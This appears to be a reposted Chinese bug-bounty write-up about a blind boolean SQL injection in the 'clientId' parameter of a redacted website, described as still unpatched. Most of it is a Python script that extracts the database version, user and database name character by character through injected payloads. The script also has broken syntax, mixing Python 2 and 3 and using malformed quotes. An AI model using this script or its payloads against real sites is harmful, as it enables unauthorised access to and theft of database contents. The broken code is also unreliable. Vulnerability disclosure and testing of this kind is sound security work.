高危XX某站SQL注入

Posted huim

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了高危XX某站SQL注入相关的知识,希望对你有一定的参考价值。

RANK 24

金币    24

等价RMB  240

与上一漏洞同源所以只有24

 

数据包:

GET /check?clientId=64915 HTTP/1.1

Host: aaa.bbb.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/62.0.3202.89 Safari/537.36

Accept: */*

Cookie:XX

Connection: close

 

clientId参数存在布尔型注入,sqlmap没注出来数据,所以写了个脚本验证

脚本

按照惯例,代码中可能泄露漏洞相关位置信息的都给去掉了,或者打码了。很新鲜,还未修好。

 1 #! /usr/bin/env python3
 2 # Date : 1/5 16:04
 3 # Comment: no comment
 4 
 5 
 6 import requests
 7 
 8 raw_url = xxx
 9 burp0_cookies = {xxx}
10 burp0_headers = {xxx}
11 
12 
13 def get_version():
14     version = ‘‘
15     for i in range(1, 20):
16         for j in range(32, 127):
17             burp0_url = "http://aaa.bbb.com/check?clientId=54915‘/**/or/**/ascii(mid(version()," + str(i) + ",1))=" + str(j)
18             print burp0_url
19             try:
20                 res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
21             except Exception as e:
22                 continue
23             if "true" in res.text:
24                 version += chr(j)
25                 break
26         print(version:, version)
27 
28 
29 def get_user():
30     user = ‘‘
31     for i in range(1, 20):
32         for j in range(32, 127):
33             burp0_url = "http://aaa.bbb.com/check?clientId=54915‘/**/or/**/ascii(mid(user()," + str(i) + ",1))=" + str(j)
34             print burp0_url
35             try:
36                 res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
37             except Exception as e:
38                 continue
39             if "true" in res.text:
40                 user += chr(j)
41                 break
42         print(user:, user)
43 
44 
45 def get_db():
46     current_db = ‘‘
47     for i in range(1, 20):
48         for j in range(32, 127):
49             burp0_url = "http://aaa.bbb.com/check?clientId=54915‘/**/or/**/ascii(mid(database()," + str(i) + ",1))=" + str(j)
50             print burp0_url
51             try:
52                 res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
53             except Exception as e:
54                 continue
55             if "true" in res.text:
56                 current_db += chr(j)
57                 break
58         print(current_db:, current_db)
59 
60 get_version()
61 get_db()
62 get_user()

 

sqlmap跑不出,就是扫描器先跑出来,但是sqlmap验证不了,却又确实存在的,可以写脚本验证,这是一种思路吧。

 

以上是关于高危XX某站SQL注入的主要内容,如果未能解决你的问题,请参考以下文章

实战手工注入某站,mssql注入

Zabbix-20160817-高危SQL注入漏洞

注意Zabbix高危SQL注入漏洞分析

请注意!Zabbix高危SQL注入漏洞分析

关于zabbix存在SQL注入高危漏洞的安全公告

zabbix再爆高危SQL注入漏洞,可获操作系统权限